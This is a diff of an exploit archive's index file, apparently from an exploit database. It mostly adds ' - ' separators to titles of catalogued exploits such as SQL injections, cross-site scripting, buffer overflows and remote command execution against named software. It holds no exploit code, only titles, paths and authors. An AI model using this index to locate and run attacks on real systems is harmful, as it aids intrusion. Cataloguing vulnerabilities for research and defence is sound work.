23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0 @@ -20548,7 +20548,7 @@ id,file,description,date,author,platform,type,port 23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6-10 Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0 -23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution (0Day)",2012-12-12,Abysssec,windows,remote,0 +23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent - XML Parsing Remote Code Execution (0Day)",2012-12-12,Abysssec,windows,remote,0 23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Path Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps,0 @@ -20562,16 +20562,16 @@ id,file,description,date,author,platform,type,port 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 Listing Parameter Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps,0 -23337,platforms/windows/dos/23337.c,"Avaya Argent Office Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 +23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 23338,platforms/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 dir Parameter HTML Injection",2003-11-04,nimber@designer.ru,php,webapps,0 23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0 23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6.0 Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0 23341,platforms/hp-ux/local/23341.c,"HP-UX 10/11 NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local,0 23342,platforms/hp-ux/local/23342.c,"HP-UX 10/11 NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local,0 23343,platforms/hp-ux/local/23343.c,"HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0 -23344,platforms/linux/local/23344.txt,"IBM DB2 db2start Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 -23345,platforms/linux/local/23345.txt,"IBM DB2 db2stop Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 -23346,platforms/linux/local/23346.txt,"IBM DB2 db2govd Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 +23344,platforms/linux/local/23344.txt,"IBM DB2 db2start Format String - Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 +23345,platforms/linux/local/23345.txt,"IBM DB2 db2stop Format String - Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 +23346,platforms/linux/local/23346.txt,"IBM DB2 db2govd Format String - Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 23349,platforms/linux/dos/23349.txt,"IBM DB2 db2govd Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 @@ -20648,7 +20648,7 @@ id,file,description,date,author,platform,type,port 23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 Webserver Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote,0 23452,platforms/linux/dos/23452.txt,"Tcpdump 3.x - L2TP Parser Remote Denial of Service",2003-12-20,"Przemyslaw Frasunek",linux,dos,0 23427,platforms/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 -23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 +23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0 23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 PollBooth.php Multiple SQL Injection",2003-12-10,frog,php,webapps,0 23431,platforms/multiple/dos/23431.pl,"SX Design sipd 0.1.2 - Remote Denial of Service",2003-12-11,storm,multiple,dos,0 @@ -20667,7 +20667,7 @@ id,file,description,date,author,platform,type,port 23444,platforms/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,multiple,dos,0 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 osCsid Parameter Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x - ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 -23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 +23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL - Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"phpwcms 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - index.inc.php File Include",2003-12-20,frog,php,webapps,0 23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 members/index.inc.php File Include",2003-12-20,frog,php,webapps,0 @@ -20687,7 +20687,7 @@ id,file,description,date,author,platform,type,port 23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos,0 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash PoC",2012-12-18,coolkaveh,windows,dos,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 -23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",2012-12-18,Metasploit,windows,remote,0 +23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow",2012-12-18,Metasploit,windows,remote,0 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 @@ -20717,7 +20717,7 @@ id,file,description,date,author,platform,type,port 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0 23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF XSS",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 -23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,Metasploit,windows,remote,0 +23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,Metasploit,windows,remote,0 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 @@ -20727,7 +20727,7 @@ id,file,description,date,author,platform,type,port 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 -23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 +23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 @@ -20755,7 +20755,7 @@ id,file,description,date,author,platform,type,port 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",windows,remote,0 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,windows,dos,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - Edit.CGI Remote Directory Traversal",2004-01-10,FIST,cgi,webapps,0 -23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 +23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.php Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service",2004-01-12,dr_insane,windows,dos,0 23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 Controls Format String",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 @@ -20793,10 +20793,10 @@ id,file,description,date,author,platform,type,port 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection",2012-12-21,"High-Tech Bridge SA",php,webapps,0 -23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 +23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 -23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 -23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 +23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT - Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 +23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT - Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module - File Descriptor Leakage",2004-01-21,"Steve Grubb",linux,local,0 23582,platforms/cgi/remote/23582.txt,"Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting",2004-01-22,"Rafel Ivgi The-Insider",cgi,remote,0 23583,platforms/multiple/remote/23583.txt,"Netbus 2.0 Pro Directory Listings Disclosure and File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote,0 @@ -20818,7 +20818,7 @@ id,file,description,date,author,platform,type,port 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",multiple,remote,0 23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,Metasploit,windows,remote,0 -23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,Metasploit,multiple,remote,0 +23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution",2012-12-23,Metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 @@ -20829,7 +20829,7 @@ id,file,description,date,author,platform,type,port 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 -23612,platforms/windows/remote/23612.txt,"BRS WebWeaver 1.0.7 ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 +23612,platforms/windows/remote/23612.txt,"BRS WebWeaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 @@ -20851,7 +20851,7 @@ id,file,description,date,author,platform,type,port 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0 23633,platforms/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service",2004-02-02,"Zero X",windows,dos,0 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 -23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D Remote Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 +23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Remote Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - general.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service",2004-02-03,blackangels,hardware,dos,0 @@ -20861,11 +20861,11 @@ id,file,description,date,author,platform,type,port 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy",2004-02-03,"Andreas Sandblad",windows,remote,0 23644,platforms/php/webapps/23644.php,"phpx 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 -23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 -23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 +23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 +23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 -23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 +23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler Command Injection",2012-12-25,Metasploit,windows,remote,0 23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 @@ -20890,7 +20890,7 @@ id,file,description,date,author,platform,type,port 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0 23673,platforms/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injection",2012-12-26,v3n0m,php,webapps,0 23674,platforms/linux/local/23674.txt,"Linux Kernel Samba 2.2.8 (Debian / Mandrake) - Share Local Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 -23675,platforms/windows/remote/23675.txt,"Microsoft Windows XP HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote,0 +23675,platforms/windows/remote/23675.txt,"Microsoft Windows XP HCP URI Handler - Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote,0 23676,platforms/asp/webapps/23676.txt,"MaxWebPortal 1.3x down.asp HTTP_REFERER XSS",2004-02-10,"Manuel Lopez",asp,webapps,0 23677,platforms/asp/webapps/23677.txt,"MaxWebPortal 1.3x Personal Message SendTo Parameter XSS",2004-02-10,"Manuel Lopez",asp,webapps,0 23678,platforms/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote,0 @@ -20910,8 +20910,8 @@ id,file,description,date,author,platform,type,port 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter XSS",2004-02-16,"Nick Gudov",asp,webapps,0 -23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 -23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 +23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 gotopage.cgi Traversal - Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 +23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 genindexpage.cgi Traversal - Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (1)",2004-02-16,gsicht,windows,dos,0 23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos,0 @@ -20926,13 +20926,13 @@ id,file,description,date,author,platform,type,port 23718,platforms/php/webapps/23718.txt,"Ecommerce Corporation Online Store Kit 3.0 shop.php cat Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 23719,platforms/php/webapps/23719.txt,"Ecommerce Corporation Online Store Kit 3.0 shop_by_brand.php cat_manufacturer Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 23720,platforms/php/webapps/23720.txt,"Ecommerce Corporation Online Store Kit 3.0 listing.php id Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0 +23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0 23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - multiplechoice/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 glossary.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23724,platforms/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 newmultiplechoice.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 glossaries/index.php file Parameter Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 readings/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 resultsignore.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 glossary.php - Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23724,platforms/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 newmultiplechoice.php - Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 glossaries/index.php file Parameter - Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 readings/index.php - Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 resultsignore.php - Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - Error.ASP Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location Weakness",2004-02-19,"Michael Evanchik",windows,remote,0 @@ -20941,13 +20941,13 @@ id,file,description,date,author,platform,type,port 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 -23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 +23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilites",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun",2004-02-23,kralor,windows,remote,0 -23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 Functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 +23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - Functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 u2uadmin.php uid Parameter XSS",2004-02-23,"Janek Vind",php,webapps,0 @@ -20994,8 +20994,8 @@ id,file,description,date,author,platform,type,port 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0 -23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 -23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0 +23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 +23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting 